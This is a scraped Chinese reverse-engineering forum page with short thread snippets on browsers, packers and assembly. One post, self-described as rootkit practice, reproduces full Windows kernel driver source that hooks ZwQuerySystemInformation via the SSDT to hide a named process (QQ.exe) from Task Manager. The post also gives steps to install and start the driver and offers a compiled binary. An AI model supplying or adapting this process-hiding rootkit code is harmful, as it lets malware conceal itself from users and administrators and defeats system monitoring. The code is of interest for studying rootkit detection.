|
|
|
[原创]纯C实现多页面山寨浏览器(KsBinExplorer)
有一会我去面试,公司说他做了一个浏览器,还向我演示了一把。我高高兴兴去上班后才发现他们封装了IE控件。 |
|
[分享]做了两个语音视频, 壳的全程分析, 高手飘过吧
虽然不是高手,但我一样飘过! |
|
|
|
|
|
[分享]自己写了个壳,大家来看看
支持楼主,支持原创软件 |
|
[求助]加密成功,但文件被破坏了
试试freeX64。我打算自从有这个软件以后就尽量用它,不过它也有好多条件下不能使用(作者也不改进一下)。 下面是天空的下载页面。 http://www.skycn.com/soft/53690.html |
|
[分享]发现一个新壳(据说支持PE64)
错了!应该是放到“加壳脱壳”里 |
|
|
|
隐藏系统进程的工具[推荐][分享]
最初由 蓝色光芒 发布 Ring0的修改连表 具体怎莫作能分享一下吗?给个连接或其他啥的都好哇! |
|
隐藏系统进程的工具[推荐][分享]
标题:Hook ZwQuerySystemInformation 隐藏qq程序 性质:原创 作者:锦毛鼠 来源:Www.CduHacker.Com 日期;2005.12.24 哈哈今天晚上就是平安夜了哦,在这里祝贺和我一起同居的"多行",电子科大九里堤小校区210寝室,24201010班的全体同学.......................(晕。太多了哈)...圣诞快乐哈. 最近一直在研究rootkit,首先申明我是rootkit的菜鸟哈,也感觉还么有研究得好深。这次我把我练习时写的一个hook 系统 ZwQuerySystemInformation 函数来实现隐藏QQ进程的代码贴上来,也算是为成黑添砖添瓦哦。隐藏了的进程能够被rootkit的检测工具检测出来,但是一般的方法是看不出来的,比如任务管理器,和程序里面列出进程都是看不到的。程序中我已经添加了相关的注释,这里就不多说了。关于这种技术的文章网上有很多,我也只是为自己总结一下吧。代码如下 代码: //////////////////////////////////////////////////////////////////////////////// //文件名: hider.c // 作者: 锦毛鼠(成都黑客在线)HTTP://Www.CduHacker.Com // 功能: 用驱动程序实现要保护的程序的进程 // 修改: 2005.12.23 开始编写 // 编译: bulid // 环境: win2000sp4+vc6.0+win2000 DDK //////////////////////////////////////////////////////////////////////////////// #include "ntddk.h" #include "stdio.h" #include "stdlib.h" #include "hider.h" #define NT_PROCNAMELEN 16 #define PROCNAMELEN 20 #pragma pack(1) typedef struct ServiceDescriptorEntry { unsigned int *ServiceTableBase; unsigned int *ServiceCounterTableBase; //Used only in checked build unsigned int NumberOfServices; unsigned char *ParamTableBase; } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t; #pragma pack() __declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable; //定义一个宏SYSTEMSERVICE(_function) #define SYSTEMSERVICE(_function) KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)] struct _SYSTEM_THREADS { LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER CreateTime; ULONG WaitTime; PVOID StartAddress; CLIENT_ID ClientIs; KPRIORITY Priority; KPRIORITY BasePriority; ULONG ContextSwitchCount; ULONG ThreadState; KWAIT_REASON WaitReason; }; struct _SYSTEM_PROCESSES { ULONG NextEntryDelta; ULONG ThreadCount; ULONG Reserved[6]; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ProcessName; KPRIORITY BasePriority; ULONG ProcessId; ULONG InheritedFromProcessId; ULONG HandleCount; ULONG Reserved2[2]; VM_COUNTERS VmCounters; IO_COUNTERS IoCounters; //windows 2000 only struct _SYSTEM_THREADS Threads[1]; }; //驱动入口函数DriverEntery NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING registryPath ) { int i; DbgPrint("驱动加载成功.."); GetProcessNameOffset(); //注册驱动分发函数 for (i=1;i<IRP_MJ_MAXIMUM_FUNCTION;i++) { DbgPrint("MajorFunction.."); DriverObject->MajorFunction[i]=OnDispatch; } //注册驱动卸载函数 DriverObject->DriverUnload=OnUnload; OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)); _asm cli (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation))= NewZwQuerySystemInformation; _asm sti return STATUS_SUCCESS; } //用户自定义的NewZwQuerySystemInformation NTSTATUS NewZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength ) { NTSTATUS rc; CHAR aProcessName[PROCNAMELEN]; GetProcessName( aProcessName ); rc = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) ( SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength ); if( NT_SUCCESS( rc ) ) { // double check the process name, if it starts w/ '_root_' DO NOT // apply any stealth if(0 == memcmp(aProcessName, "_root_", 6)) { DbgPrint("rootkit: detected system query from _root_ process\n"); } else if( 5 == SystemInformationClass ) { // this is a process list, look for process names that start with // '_root_' struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation; struct _SYSTEM_PROCESSES *prev = NULL; DbgPrint("rootkit: NewZwQuerySystemInformation() from %s\n", aProcessName); while(curr) { //struct _SYSTEM_PROCESSES *next = ((char *)curr += curr->NextEntryDelta); int bMod = FALSE; ANSI_STRING process_name; RtlUnicodeStringToAnsiString( &process_name, &(curr->ProcessName), TRUE); if( (0 < process_name.Length) && (255 > process_name.Length) ) { if(0 == memcmp( process_name.Buffer, "QQ.exe", 6)) //修改成你要隐藏的程序 { ////////////////////////////////////////////// // we have a winner! ////////////////////////////////////////////// char _output[255]; char _pname[255]; memset(_pname, 0, 255); memcpy(_pname, process_name.Buffer, process_name.Length); sprintf( _output, "rootkit: hiding process, pid: %d\tname: %s\r\n", curr->ProcessId, _pname); DbgPrint(_output); if(prev) { if(curr->NextEntryDelta) { // make prev skip this entry prev->NextEntryDelta += curr->NextEntryDelta; bMod = TRUE; //flag to say that we have modified } else { // we are last, so make prev the end prev->NextEntryDelta = 0; } } else { if(curr->NextEntryDelta) { // we are first in the list, so move it forward (char *)SystemInformation += curr->NextEntryDelta; } else { // we are the only process! SystemInformation = NULL; } } } } RtlFreeAnsiString(&process_name); prev = curr; if(!bMod) prev = curr; if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta); else curr = NULL; } } } return(rc); } //获得程序名字 int GetProcessName( PCHAR theName ) { PEPROCESS curproc; char *nameptr; ULONG i; KIRQL oldirql; if( g_ProcessNameOffset ) { curproc = PsGetCurrentProcess(); nameptr = (PCHAR) curproc + g_ProcessNameOffset; strncpy( theName, nameptr, NT_PROCNAMELEN); theName[NT_PROCNAMELEN] = 0; /* NULL at end */ return TRUE; } return FALSE; } //驱动卸载函数OnUnLoad VOID OnUnload( IN PDRIVER_OBJECT DriverObject ) { PDEVICE_OBJECT p_NextObj; PDEVICE_OBJECT OldDeviceObject; p_NextObj=DriverObject->DeviceObject; DbgPrint("OnUnload.."); while (p_NextObj != NULL) { OldDeviceObject=p_NextObj; p_NextObj=p_NextObj->NextDevice; IoDeleteDevice(OldDeviceObject); } _asm cli (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = OldZwQuerySystemInformation; _asm sti return STATUS_SUCCESS; } //驱动分发函数,隐藏要保护的进程 NTSTATUS OnDispatch( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irq ) { Irq->IoStatus.Status = STATUS_SUCCESS; IoCompleteRequest (Irq,IO_NO_INCREMENT); return Irq->IoStatus.Status; } //获取函数偏移地址函数GetProcessNameOffset void GetProcessNameOffset() { int i; PEPROCESS curproc; DbgPrint("GetProcessNameOffset.."); curproc = PsGetCurrentProcess(); for( i = 0; i < 3*PAGE_SIZE; i++ ) { if( !strncmp( "System", (PCHAR) curproc + i, strlen("System") )) { g_ProcessNameOffset = i; } } } hider.h 代码: //////////////////////////////////////////////////////////////////////////////// //文件名: hider.h // 作者: 锦毛鼠(成都黑客在线)HTTP://Www.CduHacker.Com // 功能: 定义函数,和全局变量 // 修改: 2005.12.23 开始编写 // 编译: bulid // 环境: win2000sp4+vc6.0+win2000 DDK //////////////////////////////////////////////////////////////////////////////// typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)( ULONG SystemInformationCLass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); //全局变量部分 ULONG g_ProcessNameOffset; ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation; //函数定义部分 void GetProcessNameOffset(); void OnUnload( IN PDRIVER_OBJECT); NTSTATUS OnDispatch(IN PDEVICE_OBJECT,IN PIRP); int GetProcessName(PCHAR); NTSTATUS NewZwQuerySystemInformation(IN ULONG SystemInformationClass,IN PVOID SystemInformation,IN ULONG SystemInformationLength,OUT PULONG ReturnLength); NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength); 这里是编译好的程序提供下载。 测试方法。 1,先导入注册表,然后复制hider.sys到system32目录下面. 2,重新启动机器. 3,命令提示符下面 "net start hider" 4 ,打开QQ程序 5,打开任务管理器. 这时你就在任务管理器里面看不到qq的进程了 |
|
隐藏系统进程的工具[推荐][分享]
最初由 linestyle 发布 都有什莫方法呀?请高手讲一讲 ZwQuerySystemInformation怎莫查不到? |
|
|
|
新学汇编,请教一个试验的问题
xor bx,bx mov ds,bx mov cx,64 la:mov [bx+23fh],cl dec bx loop la mov ax,4c00h int 21h |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值